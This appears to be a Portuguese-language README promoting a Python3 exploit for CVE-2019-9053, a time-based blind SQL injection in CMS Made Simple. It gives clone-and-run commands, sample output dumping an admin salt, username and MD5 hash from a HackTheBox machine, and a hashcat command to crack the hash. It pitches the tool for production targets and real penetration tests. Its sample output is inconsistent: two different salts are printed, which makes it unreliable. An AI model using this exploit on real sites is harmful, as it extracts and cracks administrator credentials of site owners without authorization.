
Exploit Python3 para CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Sem dependências, SQLi cega baseada em tempo → extração de credenciais de admin. Writeup HTB dominado.
Port puro em Python3 do Exploit-DB original #46635 por Daniele Scanu. SQLi cega baseada em tempo para extrair credenciais de administrador de instalações vulneráveis do CMS Made Simple.
✅ Sem dependências externas (apenas requests)
✅ Nativo Python 3.6+ (f-strings, operador walrus)
✅ Saída colorida bonita (ANSI)
✅ Estável e rápido (~3-5 min de extração em conexões médias)
✅ Tratamento de timeout/erro para alvos em produção
✅ Saída pronta para hashcat (formato salt + MD5)
# Clone & execute
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
# Exemplo de saída (Writeup HTB):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt
TIME = 3 # Tempo de pausa (mais lento = mais estável)
timeout = 20 # Timeout da requisição
chars = '...' # Conjunto de caracteres personalizado
Autor original: Daniele Scanu
Exploit-DB: #46635
Port Python3 e melhorias: Tim Karov
Licença MIT - Veja LICENSE
⭐ Dê uma estrela se útil! Usado em laboratórios HTB/TryHackMe e testes de penetração reais.